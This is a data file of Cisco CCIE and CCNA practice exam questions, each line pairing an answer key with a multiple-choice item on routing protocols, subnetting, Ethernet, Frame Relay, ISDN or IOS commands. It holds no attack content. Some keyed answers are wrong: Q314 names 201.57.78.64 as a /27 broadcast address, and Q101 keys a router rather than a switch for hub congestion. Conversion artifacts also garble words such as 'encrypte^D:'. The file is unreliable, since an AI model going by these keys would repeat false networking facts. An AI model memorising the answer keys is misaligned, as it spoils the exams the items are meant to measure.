C	#CCIE Q151 Is MTU part of the metric calculation of an EIGRP route?^A. No, never.^B. Yes, always.^C. Only if the appropriate K-value is activated.^D. Only the smallest MTU of any links along the path is used with the metric calculation.
D	#CCIE Q152 According to the IEEE 802.3 CSMA/CD specification, what MAC address is used for the PAUSEmechanism to inhibit the flow of frames for specified period of time?^A. 0000^B. 0001^C. 003C^D. 0101^E. 1111
B	#CCIE Q153 Using Transmission Control Protocol (TCP) encapsulation, when will the Data Link Switching (DLSW)peers go into CONNECT state?^A. When test frame broadcasts are sent.^B. When the peers finish Capabilities Exchange.^C. Never- there is no such thing as the CONNECT state.^D. When the CUR/ICR exchange takes place.
B	#CCIE Q155 What protocol is not disabled by the no service tcpservers command?^A. Echo^B. Finger^C. Chargen^D. Discard^E. Daytime
B	#CCIE Q156 IEEE 802.1D describes a method to prevent the disconnection of a single end station from disruptionSpanning Tree. ^  What does the method describe?^A. Re-setting the Topology Change flag to zero (0).^B. Disabling the 801.1D Change Detection parameter.^C. Configuring the BridgeForwardDelay to 1/2 of the BridgeMaxage.^D. Using the BridgeForwardDelay timer to age out dynamic entries.
B	#CCIE Q157 In IP multicast networks, the Reverse Path Forward (RPF) check is primarily used to:^A. Determine which interfaces should be including in the outgoing interface list.^B. Prevent multicast traffic from looping through the network.^C. Prevent multicast traffic from being sent by unauthorized sources.^D. Establish the reverse flow path of multicast traffic from the receiver to the source.
C	#CCIE Q158 What is not a primary goal of Random Early Discard?^A. Minimizing packet delay jitter.^B. Avoiding global synchronization for TCP traffic.^C. Supporting bursty traffic without bias.^D. Avoid starvation of the lower priority queues.
B,C	#CCIE Q161 Both GTS and FRTS are similar in implementation, but differ in regard to:^A. GTS applies only on a per interface basis and can use access lists to select the traffic to shape.^B. For GTS, the shaping queue is weighted fair queue (WFQ).For FRTS, WFQ is not supported; instead, the queue can be a CQ, PQ or FIFO.^C. FRTS supports shaping on a per-DLCI basis, while GTS is configurable per interface or subinterface.^D. GTS works with a variety of Layer 2 technologies, including Frame Relay, ATM, SwitchedMultimegabit Data Service, and Ethernet."
B	#CCIE Q162 A new 10/100 NIC is being connected to a Catalyst 5000 switch port. ^  Which settings will result in the bestconnection?^A. NIC: 100 Mbps & Full-duplexCatalyst: Auto^B. NIC: Auto Catalyst: 100 Mbps & Full-duplex^C. NIC: 100 Mbps & Half-duplex Catalyst: Auto^D. NIC: 10 Mbps & Halfduplex
E	#CCIE Q163 PIMv2 control messages are sent using which IP protocol?^A. UDP^B. TCP^C. IGMP^D. Protocol number 109^E. Protocol number 103
C,D,E	#CCIE Q164 Which examples would have an administrative distance lower than 120?^A. External EIGRP routes.^B. iBGP routes.^C. Internal EIGRP routes.^D. Static routes.^E. ISIS routes
A	#CCIE Q165 Which statement is true?^A. PNNI has QoS awareness and has layer two reachability support.^B. PNNI ignores QoS and supports both layer two and three routing.^C. PNNI supports redistribution of IP routes to ATM routing tables and route dampening.^D. PNNI comes up automatically when a switch is brought up, while IP routing protocols require specificconfiguration commands.^E. PNNI must be connected in a three-level hierarchical topology; Ip does not require hierarchy."
A	#CCIE Q166 What is the function of the command bgp deterministic-med?^A. It makes BGP compare MEDs between different ASs.^B. It makes default metric count as the worst possible metric.^C. It makes default metric count as the best possible metric.^D. It recorders the entries by neighbor AS.^E. It recorders the entries by MED.
A	#CCIE Q167 When the interface summary command for EIGRP is used, the metric for the summarized route isderived:^A. From the component route that has the biggest metric.^B. From the component route that has the smallest metric.^C. From the interface that has the summary command.^D. From the component route which has the longest mask.^E. From the default-metric command.
A	#CCIE Q168 Which statements are correct?^A. Within one area of ISIS, all links must have ip router isis configured.At least one link in that area must have this command, if the IP routing is to work correctly.^B. In ISIS there is only one router responsible for originating the LSP for the LAN.It is called the pseudonode.^C. The protocol ID, found in the ip header of CLNS is type 203.^D. You can run ISIS for IP, event without configuring a NET on the router.
D	#CCIE Q169 Which are examples for Physical WAN interface standards?^A. EIA/TIA 232, EIA/TIA 449, RFC 1771, and V.35.^B. EIA/TIA 232, EIA/TIA 449, IEEE 802.3 and IEEE 802.5.^C. IEEE 802.3, IEEE 802.5, ISO 8648 and RFC 1771.^D. EIA/TIA 232, EIA/TIA 449, V.35, HSSI and EIA 530.
C	#CCIE Q170 According to the IEEE 802.3 CSMA/CD specification, which is proper signal for contact 6 of a PHYwithout an internal crossover MDI Signal?^A. Receive +^B. Transmit +^C. Receive ^D. Transmit 
C	#CCIE Q171 Which OSPF routers can originate an ASBR-summary LSA type 4?^A. Only ASBRs.^B. Only ABRs.^C. ASBRs and ABRs if they are originating indication LSAs.^D. ASBRs with the summary command for OSPF routes configured.^E. ABRs with the area-range command configured.
A,C,D	#CCIE Q172 Which BGP attributes are well known?^A. Next-hop^B. Aggregator^C. AS-path^D. Atomic-aggregate^E. MED
B	#CCIE Q173 BGP synchronization means:^A. A BGP router can only advertise an eBGP-learned route if the route is in the BGP table with a metric of0.^B. A BGP router can only advertise an eBGP-learned route if the route is in the routing table as an IGProute.^C. A BGP router can only advertise an iBGP-learned route if the route is in the routing table of all its iBGPneighbors.^D. A BGP router can only advertise an iBGP-learned route if the route is in the BGP table but not in therouting table.^E. A BGP router can only advertise an iBGP-learned route of the route is in the routing table as an IGProute.
C	#CCIE Q174 A serial interface needs to support IP-based voice traffic in a strict priority queue. ^  All other traffic shouldbe handled through the weighted fair queuing mechanism. ^  What interface level command would enablethe queue for the voice traffic?^A. ip llc-queue^B. ip rtp priority^C. priority-group^D. fair-queue
E	#CCIE Q175 What is the EIGRP multicast flow timer?^A. The timer after which EIGRP stops forwarding multicast data traffic.^B. The timeout timer after which EIGRP retransmits, unicasting the neighbor not in CR mode.^C. The time interval between consecutive received EIGRP hello intervals.^D. The timer interval between consecutive transmitted EIGRP hello intervals.^E. The timeout timer after which EIGRP retransmits, unicasting the neighbor in CR mode.
B	#CCIE Q176 RTP typically uses which protocols as a transport?^A. IP/TCP^B. IP/UDP^C. IP/RTCP^D. H.323/H.245^E. None of the above.
C	#CCIE Q177 The first ISUP message sent by an originating node when establishing a call using Signalling System 7 is:^A. an ACM^B. an ANM^C. an IAM^D. a REL^E. A RLC
C	#CCIE Q179 A serial interface with flow-based WFQ is carrying 25 flows. ^  Twelve flows are marked as IP Precedence0, ten flows are marked as IP Precedence 1, and three flows are marked as IP Precedence 5.^  Approximately how much interface bandwidth is allocated to one of the IP Precedence 5 flows?^A. 4%^B. 6%^C. 12%^D. 15%^E. 25%
A	#CCIE Q180 Through how many states do two ISIS neighbors pass when building their adjacency?^A. 2: Init, Up^B. 3: Init, 2-way, Full^C. 4: Start, Loading, Synchronizing, Up^D. 5: Init, 2-way, Exstart, Exchange, Up^E. 6: Init, 2-way, Exstart, Exchange, Full
D	#CCIE Q181 Which of these codecs consumes the most bandwidth?^A. G.729^B. G.723^C. GSM^D. G.711^E. G.728
A	#CCIE Q182 On a Full Duplex Gigabit link between a Router and a switch the collision counter is incrementing.What is the likely cause?^A. Collisions cannot occur on a Full Duplex Gigabit Link so this is either due to a bug or brokenequipment.^B. The Router is receiving too much traffic and is asserting the Collision signal to be able to slow down therate that the switch is sending traffic.^C. Both the Router and the Switch attempted to send at the same time, both detected this and then backedoff and retransmitted after a random amount of time.This is not the problem.^D. The switch and the router might be running 802.1q trunking.When using 802.1q trunking, a collision is counted every time a frame comes in on an incorrect lengthfield.
A	#CCNA Q. 141	Which keystroke allows IOS to complete a partial command entry?	^A: <Tab>	^B: <Ctrl R>	^C: <Spacebar>	^D: <Right Arrow>		
B	#CCNA Q. 265	Which configuration register setting tells the router to look in NVRAM for the boot sequence?	^A: 0x42	^B: 0x2102	^C:0x001	^D: 0x2101		
B	#CCNA Q. 323	What is the bit pattern for the first octet of a class B network address?	^A: 0xxxxxxx	^B: 10xxxxxx	^C: 110xxxxx	^D: 1110xxxx	^E: 11110xxx	
A	#CCNA Q. 237 	What is the bit pattern for the first octet of a class A network address? 	^A: 0xxxxxxx 	^B: 10xxxxxx 	^C: 110xxxxx 	^D: 1110xxxx 	^E: 11110xxx 	
B	#CCNA Q. 195	You are configuring a Frame Relay Router with subinterfaces on interface Serial 0. Which subinterface number could you use for this configuration?	^A: 1 and 2.	^B: 0.2 and 0.3	^C: 1 and 1.1	^D: 0.1a and 0.1^B:		
A	#CCNA Q. 208	Calculate the number of usable networks and usable hosts for the network 210.106.14.0/24.	^A: 1 network with 254 hosts	^B: 2 networks with 128 hosts	^C: 4 networks with 64 hosts	^D: 6 networks with 30 hosts		
D	#CCNA Q. 142	Eight stations connected to separate 10Mbps ports on a layer 2 switch will give each station how many Mbps of bandwidth?	^A: 1.25	^B: 4	^C: 16	^D: 10	^E: 60	
C	#CCNA Q. 50	What is the maximum length of the fast Ethernet cable 100BaseTx standard?	^A: 10 m	^B: 50 m	^C: 100 m	^D: 1000 m		
C	#CCNA Q. 171	Which range of possible numbers do standard IPX access lists have?	^A: 100 - 199	^B: 600 - 699	^C: 800 - 899	^D: 1000 - 1099		
C	#CCNA Q. 248 	What is the range of binary values for the first octet in class B addresses? 	^A: 10000000-11111111 	^B: 00000000-10111111 	^C: 10000000-10111111 	^D: 10000000-11011111 	^E: 11000000-11101111 	
C,D	#CCNA Q. 254 	Which of the following Ethernet standards can operate in full-duplex mode? (Choose two.) 	^A: 10Base2 	^B: 10Base5 	^C: 10BaseT 	^D: 100BaseT 		
D	#CCNA Q. 49	What is the maximum number of subnets that can be assigned to networks when using the address 172.16.0.0 with a subnet mask of 255.255.240.0? (Assume older version UNIX workstations are in use.)	^A: 16	^B: 32	^C: 30	^D: 14	^E: It is an invalid subnet mask for the Network	
B	#CCNA Q. 95	What is the bandwidth capacity of an ISDN B channel?	^A: 16 Kbps	^B: 64 Kbps	^C: 128 Kbps	^D: 512 Kbps	^E: 1.54 Mbps	
D	#CCNA Q. 134	Given an IP address of 172.16.2.160 and a subnet mask of 255.255.255.192, to which subnet does the host belong?	^A: 172.16.2.32	^B: 172.16.2.64	^C: 172.16.2.96	^D: 172.16.2.128	^E: 172.16.2.192	
C	#CCNA Q. 154	Which IP address range is allowable given an IP address of 172.37.2.56 and 28-bits of subnetting?	^A: 172.37.2.48 to 172.37.2.63	^B: 172.37.2.48 to 172.37.2.6.2	^C: 172.37.2.49 to 172.37.2.62	^D: 172.37.2.49 to 172.37.2.63	^E: 172.37.2.55 to 172.37.2.126	
D	#CCNA Q. 226 	What is an example of a valid MAC address? 	^A: 192.201.63.251 	^B: 19-22-01-63-25 	^C: 0000.1234.FEG 	^D: 00-00-12-34-FE-AA 		
A,C,D	#CCNA Q. 31	Given the network 199.141.27.0 with a subnet mask of 255.255.255.240, identify the valid host addresses. (Choose three:)	^A: 199.141.27.33	^B: 199.141.27.112	^C: 199.141.27.119	^D: 199.141.27.126	^E: 199.141.27.175	
A	#CCNA Q. 131	How many valid host IP addresses are available on the following network/subnetwork? 176.12.44.16/30	^A: 2	^B: 30	^C: 254	^D: 16,382	^E: 65,534	
C	#CCNA Q. 238 	What is the network address for a host with the IP address 201.100.5.68/28? 	^A: 201.100.5.0 	^B: 2001.100.5.32 	^C: 201.100.5.64 	^D: 201.100.5.65 	^E: 201.100.5.31 	^F: 201.100.5.1 
B	#CCNA Q. 314	Which of the following is a subnet broadcast address for network 201.57.78.0/27?	^A: 201.57.78.33	^B: 201.57.78.64	^C: 201.57.78.87	^D: 201.57.78.97	^E: 201.57.78.159	^F: 201.57.78.254
E	#CCNA Q. 174	What is the bit length and expression form of a MAC address?	^A: 24 bits expression as a decimal number	^B: 24 bits expression as a hexadecimal number	^C: 36 bits expression as a binary number	^D: 48 bits expression as a decimal number	^E: 48 bits expression as a hexadecimal number	
A	#CCNA Q. 114	Which network mask should you place on a class C address to accommodate a user requirement of two sub networks with a maximum of 35 hosts on each network?	^A: 255.255.255.192	^B: 255.255.255.224	^C: 255.255.255.240	^D: 255.255.255.248		
B	#CCNA Q. 205 	Which network mask should you place on a class C address to accommodate a user requirement for five networks with a maximum of 17 hosts on each network? 	^A: 255.255.255.192 	^B: 255.255.255.224 	^C: 255.255.255.240 	^D: 255.255.255.248 		
C	#CCNA Q. 259	Which of the following describes isdn bri servie?	^A: 2d+b	^B: 23d+b	^C: 2b+d	^D: 23b+d		
E	#CCNA Q. 196	What is the total bandwidth of all channels on a BRI circuit?	^A: 54 kps	^B: 64 kps	^C: 112 kps	^D: 128 kps	^E: 144 kps	
D	#CCNA Q. 102	What is the distance limitation for 100BaseT?	^A: 607 ft	^B: 25 meters	^C: 1000 ft	^D: 100 meters	^E: 185 meters	
E	#CCNA Q. 313	Calculate the number of usable network and host addresses for 213.105.72.0/28.	^A: 62 networks and 2 hosts	^B: 6 networks and 30 hosts	^C: 8 network and 32 hosts	^D: 16 networks and 16 hosts	^E: 14 networks and 14 hosts	
D	#CCNA Q. 284	What IP address class is multicast? 	^A: A 	^B: B 	^C: C 	^D: D 	^E: E 	
A,B	#CCNA Q. 69	Which two statements about a bridge are true. (Choose two)	^A: A bridge floods multicasts.	^B: A bridge floods broadcasts.	^C: A bridge does not flood multicasts.	^D: A bridge does not flood broadcasts.		
C	#CCNA Q. 71	Which statement about an IP network is true?	^A: A broadcast source MAC contains all zeros.	^B: A MAC address is part of the physical layer of the OSI model.	^C: MAC addresses are used by bridges to make forwarding decisions: IP addresses are used by	routers.	^D: IP addresses are now a flat addressing scheme: MAC addresses use a hierarchical addressing	scheme.
B,C	#CCNA Q. 229 	Which two statements about the Frame Tagging are true? (Choose two) 	^A: A Filtering table is developed for each switch. 	^B: Frame Tagging defines a unique user defined ID to each frame. 	^C: A unique identifier is placed in the header of each frame as it is forwarding between switches. 	^D: Frame Tagging is technique that examines particular information about each frame based on userdefined 	offsets. 	
A,B	#CCNA Q. 268	Which of the following statements regarding routed and routing protocols are true? (Choose two.)	^A: A routed protocol is assigned to an interface and determines the method of packet delivery.	^B: A routing protocol determines the path of a packet through a network.	^C: A routed protocol determines the path of a packet through a network.	^D: A routing protocol operates at the transport layer of the OSI model.	^E: A routed protocol updates the routing table of a router.	
D	#CCNA Q. 267	Which of the following access list statements will deny all telnet connections to subnet 10.0.1.0/24?	^A: access-list 15 deny tcp 10.0.1.0 255.255.255.0 eq telnet	^B: access-list 115 deny tcp any 10.0.1.0 eq telnet	^C: access-list 115 deny udp any 10.0.1.0 eq 23	^D: access-list 115 deny tcp any 10.0.1.0 0.0.0.255 eq 23	^E: access-list 15 deny telnet any 10.0.1.0 0.0.0.255 eq 23	
D	#CCNA Q. 113	Which statement should you use to deny FTP access only from Network 210.93.105.0 to Network 223.8.151.0?	^A: Access-list one deny 210.93.105.0.0.0.0.0.0 any eq ftp access-list one permit any.	^B: Access-list 100 deny tcp 210.93.105.0 0.0.0.255 223.8.151.0 0.0.0.255 eq ftp	^C: Access-list 100 deny ip 223.8.151.0 0.0.0.255 any eq ftp	Access-list 100 permit ip any any	^D: Access-list 100 deny tcp 210.93.105.0 0.0.0.255 223.8.151.0 0.0.0.255 eq ftp	Access-list 100 permit ip any any
B	#CCNA Q. 96	Which command should you use to create an IP standard access list?	^A: Access-list standard 172.16.4.13	^B: Access-list 1 deny 172.16.4.13 0.0.0.0	^C: Access-list 100 deny 172.16.4.13 0.0.0.0	^D: Access-list 198 deny 172.16.4.13 255.255.255.255		
B	#CCNA Q. 101	A network is very congested Currently all the devices are connected through a hub: Which solution would best decrease congestion on the network?	^A: Add a second hub	^B: Replace the hub with a router.	^C: Replace the hub with a switch.	^D: Replace the hub with a repeater.		
D	#CCNA Q. 145	What does the command show access-list 101 list?	^A: All extended access lists.	^B: All access lists within the router.	^C: The contents of standard access list 101	^D: The contents of extended access list 101		
A,C,D,E	#CCNA Q. 48	Which of the following are true regarding passwords on a Cisco router?	^A: All passwords can be encrypte^D:	^B: All passwords can be entered using the set-up dialogue.	^C: A password can be set before a user can enter the privileged mode.	^D: A password can be set for individual lines.	^E: TACACS or Radius password authentication can be use^D:	
A,C,D	#CCNA Q. 258	What are the advantages of using the OSI layered network model? (Choose three)	^A: Allows multiple-vendor development through standardization of network components.	^B: Creates a list of communication rules that all companies must implement to get onto the Internet.	^C: Allows various types of network hardware and software to communicate.	^D: Prevents changes in one layer from affecting other layers, so it does not hamper development.	^E: Allows companies to develop proprietary interfaces.	
C	#CCNA Q. 215 	What are the generic parts of a network layer address? 	^A: An internetnetwork number and a URL . 	^B: A vendor code and a serial number. 	^C: A network number and host number. 	^D: A broadcast number and unicast number. 	^E: A domain identifier and a device identifier. 	
D	#CCNA Q. 308	Which of the following is true concerning Frame Relay multipoint subinterfaces?	^A: An IP address is required on the physical interface of the central router.	^B: All routers are required to be fully meshe^D:	^C: All routers must be in the same subnet to forward routing updates and broadcasts	^D: Multipoint is the default configuration for Frame Relay subinterfaces.		
C	#CCNA Q. 320	Which layer in the TCP/IP model corresponds to the OSI network layer?	^A: Application	^B: Transport	^C: Internet	^D: Network	^E: Physical	
D	#CCNA Q. 292	Which OSI layer uses positive acknowledgement and retransmission to ensure reliable delivery?	^A: Application	^B: Presentation	^C: Session	^D: Transport	^E: Data link	^F: Physical
D	#CCNA Q. 252 	Which OSI layer ensures reliable end-to-end delivery of data? 	^A: application 	^B: presentation 	^C: session 	^D: transport 	^E: network 	
B,C,E	#CCNA Q. 249 	Which of the following are TCP/IP Application layer protocols? (Choose three) 	^A: ARP 	^B: HTTP 	^C: SMTP 	^D: ETP 	^E: ICMP 	
A	#CCNA Q. 274	What is the correct command to change the bandwidth of the interface to 64K?	^A: bandwidth 64	^B: band width 64	^C: bandwidth 64000	^D: band width 64000	^E: bandwidth 64K	
A	#CCNA Q. 108	Which command allows the user to see a system message when logging into a router?	^A: Banner MOTD	^B: Message MOTD	^C: Banner Message	^D: Message Banner								
B	#CCNA Q. 57	Which term describes the process in which frames from one network system are placed inside the frames of another network system?	^A: bridging	^B: tunneling	^C: data-link control	^D: generic routing	^E: packet switching							
B	#CCNA Q. 157	What does the term \lquote Base\rquote  refer to in 100BaseT?	^A: Cabling type	^B: Signaling type	^C: 100 mode type	^D: Spectrum used	^E: Speed category							
A,B,D	#CCNA Q. 79	Which three are typical operational phases in a basic connection oriented network service? (Choose three)	^A: Call setup	^B: Data transfer	^C: Load Balancing	^D: Call termination	^E: Call prioritization	^F: Data segmentation	^G: Data link identification					
c	#CCNA Q. 317	What does the word -any-  mean in the following extended access list statement? access-list 101 permit ip any 192.168.69.0 0.0.0.255 eq tcp	^A: check any of the bits in the source address	^B: permit any wildcard mask for the address	^C: accept any source address	^D: check any bit in the destination address	^E: permit 255.255.255 0.0.0.0	^F: accept any destination address 						
B	#CCNA Q. 130	Which element is used to define the rate, in bits per second, which a Frame Relay switch agrees to transfer data?	^A: Clock rate	^B: Committed information rate	^C: Local management interface	^D: Data-link connection identifier	^E: Committed rate measurement interval							
B	#CCNA Q. 56 	Which element is used to define the rate, in bits per second, that a Frame Relay switch agrees to transfer data?	^A: Clock rate (CR).	^B: Committed Information Rate (CIR)	^C: Local management interface (LMI)	^D: Data-link connection identifier (DLCI)	^E: Committed Rate Measurement Interval (CRMI)							
D	#CCNA Q. 103	Which command sets the clock rate to 56 Kbps on serial0?	^A: clockrate 56	^B: clock rate 56	^C: clockrate 56000	^D: clock rate 56000	^E: set clockrate 56	^F: serial 10 clockrate 56	^G: clock rate 56000 serial 10					
C	#CCNA Q. 107	Which command retrieves the configuration file from NVRAM?	^A: Config NVRAM	^B: Copy NVRAM running-config	^C: Copy startup-config running-config	^D: Copy running-config startup-config								
A,B,F	#CCNA Q. 181	Which three commands are used to configure information into RAM on a router. (Choose three)	^A: Configure memory	^B: Configure terminal	^C: Configure overwrite	^D: Copy TFTP startup-Config	^E: Copy running-Config startup-Config	^F: Copy startup-Config running-Config						
A	#CCNA Q. 194	Which configuration task must you complete if a remote Frame Relay Router does not support Inverse ARP?	^A: Configure static maps.	^B: Define an IP address	^C: Disable DHCP on the Frame Relay router.	^D: Configure a static route to the remote network.								
C	#CCNA Q. 184	You just entered the following command routers(config) #line console 0 Which operation is most likely to follow?	^A: Configure terminal type	^B: Enter protocol parameters for a serial line	^C: Create a password on the console terminal line.	^D: Establish a terminal type 4 connection to a remote host.	^E: Change from configuration mode to console privilege mode.							
B,C	#CCNA Q. 149	Which two steps are parts of the process of creating Frame Relay subinterfaces on a point-point connection? (Choose Two)	^A: Configure the router to forward all broadcast packets	^B: Remove any network address assigned to the physical interface	^C: Configure the local data-link connection identifier for the subinterfaces	^D: Partition the total committed information rate available among the subinterfaces network 192.168.1.0 255.255.255.0 network 10.2.0.0 255.255.0.0
D	#CCNA Q. 235 	Which sequence of actions will allow telnetting from a user's PC to a router using TCP/IP? 	^A: Connect the PC's COM port to the router's console port using a straight-through cable. 	^B: Connect the PC's COM port to the router's console port using a crossover cable. 	^C: Connect the PC's COM port to the router's Ethernet port using a straight-through cable.: 	^D: Connect the PC's Ethernet port to the router's Ethernet port using a crossover cable. 	^E: Connect the PC's Ethernet port to the router's Ethernet port using a rollover cable. 	^F: Connect the PC's Ethernet port to the router's Ethernet port using a straight-through cable. 						
D	#CCNA Q. 37	Which parameter must be supplied when initializing the IGRP routing process?	^A: connected network numbers	^B: IP address mask:	^C: metric weights	^D: autonomous system number	^E: registered administrative id							
A,B,D	#CCNA Q. 224 	Which three functions are supported by connection oriented services? (Choose three) 	^A: Connection parameters are synchronized 	^B: Any loss or duplication of packets can be corrected 	^C: The data packet is independently routed and the service does not guarantee the packet will be processed 	in order. 	^D: A data communication path is established between the requesting entity and the peer device on the 	remote end system. 						
C	#CCNA Q. 175	Which command displays all the commands in the history buffer?	^A: control header	^B: show buffer	^C: show history	^D: show history buffer						
D	#CCNA Q. 179	Which commands loads a new version of Cisco IOS into the router?	^A: Copy flash ftp	^B: Copy ftp flash	^C: Copy flash tftp	^D: Copy tftp flash						
A	#CCNA Q. 106	Routers that have flash memory typically have preloaded copy of Cisco IOS software Which command should you use to make backup copy of the software image onto a network server?	^A: Copy Flash TFTP	^B: Save Copy TFTP	^C: Write Backup TFTP	^D: Write Backup (server-name)	^E: Copy backup 2 (server-name)					
C	#CCNA Q. 213 	You have powered on a new router and you want to create an initial configuration. Which mode should you use? 	^A: Copy mode 	^B: User mode 	^C: Setup mode 	^D: Startup mode 						
F	#CCNA Q. 122	With one method of transmitting fames through a switch the switch receives the complete frame and checks the frame CRC before forwarding the frame. What is this transmitting method called?	^A: CSMA/CD	^B: Full duplex.	^C: Cut through.	^D: Half duplex.	^E: Fragmentation.	^F: Stored and forwarde^D:				
C	#CCNA Q. 228 	Which one method for transporting frames through a switch which checks the destination address in the frame header immediately begins forwarding the frame. What is this frame transmission method called? 	^A: CSMA/CD 	^B: FULL DUPLEX 	^C: CUT THROUGH 	^D: HALF DUPLEX 	^E: FRAGMENTATION 	^F: STORE AND FORWARD 				
C	#CCNA Q. 290	Cisco IOS allows which keystroke(s) to complete the syntax of a partially entered command?	^A: Ctrl+shift+6 then x.	^B: Ctrl+Z	^C: TAB	^D: /?	^E: Shift					
A	#CCNA Q. 105	In the setup dialogue what do the square bracket indicate?	^A: Current or default settings.	^B: Hard coded values that cannot be modifie^D:	^C: Values entered by the administrator but not save^D:	^D: Values that must be returned to NVRAM before becoming enable^D:						
D	#CCNA Q. 13	A packet is the protocol data unit for which layer of the OSI model?	^A: Data link	^B: Session	^C: Presentation	^D: Network	^E: Transport					
B	#CCNA Q. 319 	At which OSI layer is the best path to a network determined?	^A: Data Link	^B: Network	^C: Physical	^D: Presentation	^E: Session	^F: Transport
A	#CCNA Q. 198	What does the Frame Relay switch use to distinguish between each PVC connection?	^A: Data link connection identifier (DLCIs)	^B: CNs	^C: FECNs	^D: Local management interface LMI						
F	#CCNA Q. 255 	What is the correct order of protocol data units in data encapsulation? 	^A: Data, Frame, Packet, Segment, Bit 	^B: Data, Frame, Segment, Packet, Bit 	^C: Data, Packet, Frame, Segment, Bit 	^D: Data, Packet, Segment, Frame, Bit 	^E: Data, Segment, Frame, Packet, Bit 	^F: Data, Segment, Packet, Frame, Bit 				
C	#CCNA Q. 8	During encapsulation in which order is information packaged?	^A: Data, Packet, Segment, Frame	^B: Segment, Data, Packet, Frame	^C: Data, Segment, Packet, Frame	^D: Packet, Data, Segment, frame						
A,B	#CCNA Q. 190	Which are two steps are required to configure and apply standard access list on an interface? (Choose two)	^A: Define and access list number and its parameter.	^B: Enable an interface to become part of the access list group.	^C: Define the number of access list to be supported on an interface.	^D: Copy the access list definition to each interface that will support it.						
A,B,C	#CCNA Q. 92	Which three tasks are required to configure a dial on demand routing (DDR) Basic Rate Interface (BRI) connection? (Choose three)	^A: Define static routes.	^B: Configure the dialer information.	^C: Specify interesting traffic that can enable the link.	^D: Define DDR password to exchange when the link comes up.						
C	#CCNA Q. 185	Which information must a router have in order to perform proper and efficient routing?	^A: Destination application of an incoming packet	^B: Number of other packets in a single flow of data	^C: Destination network address of an incoming packet	^D: Number of routers that know a path to the destination						
A,C	#CCNA Q. 86	Your network uses a class C address of 210.10.10.0 you must now split up the network into separate subnets to handle multiple buildings separated by router. Which two steps must you take to determine the proper subnet mask for your network? (Choose two)	^A: Determine the number of separate networks required	^B: Determine how many devices will require DHCP addressing.	^C: Determine the maximum number of host that will be on each subnet.	^D: Determine the minimum number of host that will be on each subnet.	^E: Determine which router will be the IP default gateway for each subnet.		
D	#CCNA Q. 275	Which Frame Relay feature is responsible for transmitting keepalives to ensure that the PVC does not shut down because of inactivity?	^A: DLCI ^B: BECN 	^C: FECN	^D: LMI ^E: CIR	^F: de			
A,B,C	#CCNA Q. 94	Which three statements about Frame Relay configuration using sub interfaces are true? (Choose three)	^A: Each subinterface is configured either multi point or point to point.	^B: Any network address must be removed from the physical interface.	^C: The configuration of subinterfaces is done in router Config-(if)# mode.	^D: Frame relay encapsulation must be configured on each sub interface.			
A,B	#CCNA Q. 83	What is the two most common request/reply pair with ICMP messages when using the ping command? (Choose two)	^A: Echo reply	^B: Echo request	^C: Source quench	^D: Fragment offset	^E: Information redirect	^F: Destination reachable	^G: Echo control message
B,C	#CCNA Q. 306	Which of the following are the characteristics of a Layer 2 Ethernet switch? (Choose two.)	^A: Establishes a single collision domain.	^B: Establishes multiple collision domains.	^C: Builds a dynamic MAC address mapping table	^D: Maintains a routing table	^E: Forwards unicast frames only.		
C,D	#CCNA Q. 230	Which two physical interfaces does PPP support? (Choose two) 	^A: Ethernet 	^B: Token Ring 	^C: Synchronous Serial 	^D: Asynchronous Serial 			
A,D	#CCNA Q. 125	Which two statements are true? (Choose two)	^A: Ethernet 802.3 utilizes a half duplex method for data transfer.	^B: In a 100mbps point to point connect, a full duplex connection can provide 400mbs of data transfer.	^C: Ethernet switches can use the full duplex mode to connect multiple nodes on a single port office	switch.	^D: Full duplex Ethernet takes advantage of UTP using one pair of transmission and other pair for	reception.	
A,D	#CCNA Q. 210 	Which two IPX encapsulation names are correctly paired with the Cisco IOS encapsulation names? (Choose two) 	^A: Ethernet_II-ARPA 	^B: Ethernet_802.3-SAP 	^C: Ethernet_802.2-LLLC 	^D: Ethernet_SNAP-SNAP 			
A	#CCNA Q. 277	Identify the effect of Ctrl-Z?	^A: Exits back to privileged exec mode.	^B: Disconnects from the router.	^C: Aborts the ping operation. ^D: Exits privileged exec mode				
A,B,C,D	#CCNA Q. 64	What are four ways that Fast Ethernet compares to 10BaseT Ethernet? (Choose four.)	^A: Fast Ethernet uses the Same Maximum Transmission Unit (MTU).	^B: Fast Ethernet is based on an extension to the IEEE 802.3 specification.	^C: Fast Ethernet uses the same Media Access control (MAC mechanisms).	^D: Fast Ethernet preserves the frame format that is used by 10BaseT Ethernet.	^E: Fast Ethernet offers a speed increase one hundred times that of the 10BaseT Ethernet.		
A,B,C,D	#CCNA Q. 188	What are true four ways that fast Ethernet that compares to 10baseT Ethernet (Choose four)	^A: Fast Ethernet uses the same maximum transmission unit (MTU).	^B: Fast Ethernet is based on an extension to the IEE 802.3 specifications.	^C: Fast Ethernet uses the same media access control MAC mechanism.	^D: Fast Ethernet preserves the frame format that is used by the 10BaseT Ethernet.	^E: Fast Ethernet uses a speed increase 100 times to that of the 10BaseT Ethernet.		
D	#CCNA Q. 279	Which WAN technology uses high-performance digital lines and IS packet switched?	^A: FDDI	^B: ISDN	^C: ATM	^D: Frame Relay			
A	#CCNA Q. 245 	When a router boots. Which default search sequence does it use to locate the IOS software? 	^A: Flash, TFTP server, ROM 	^B: NVRAM, TFTP server, ROM 	^C: ROM, Flash, TFTP server 	^D: ROM, NVRAM, TFTP server 			
B	#CCNA Q. 35	Which method does a Cisco Catalyst switch use to identify the VLAN membership of a frame over trunked links?	^A: Frame filtering with VLAN ID	^B: Frame tagging with VLAN ID	^C: Frame filtering with trunk ID	^D: Frame tagging with trunk ID	^E: Frame filtering with VTP port ID		
C	#CCNA Q. 240 	Which WAN service would a small office (SOHO) most likely choose as a backup for leased lines? 	^A: frame relay with svc 	^B: dedicated serial line 	^C: isdn with ddr 	^D: atm 			
D,F	#CCNA Q. 66	What are the two primary operating modes for frame switching? (Choose two)	^A: Full duplex	^B: Half duplex	^C: CSMA/CD	^D: Cut through	^E: Fragmentation	^F: Store and forward	
A,B,D,E	#CCNA Q. 41	What are four benefits that can result from applying ISDN networking?(Choose four)	^A: Full time connectivity across the ISDN supported by Cisco IOS routing using dial on demand routing DDR	^B: Small office and home office sites can be economically supported with ISDN basic rate interface BRI	services.	^C: ISDN replaces signaling system ss7 in the public switch telephone network PSTN backbone.	^D: ISDN can be used as a backup service for a lease line connection between the remote and central offices.	network access servers NAS.					
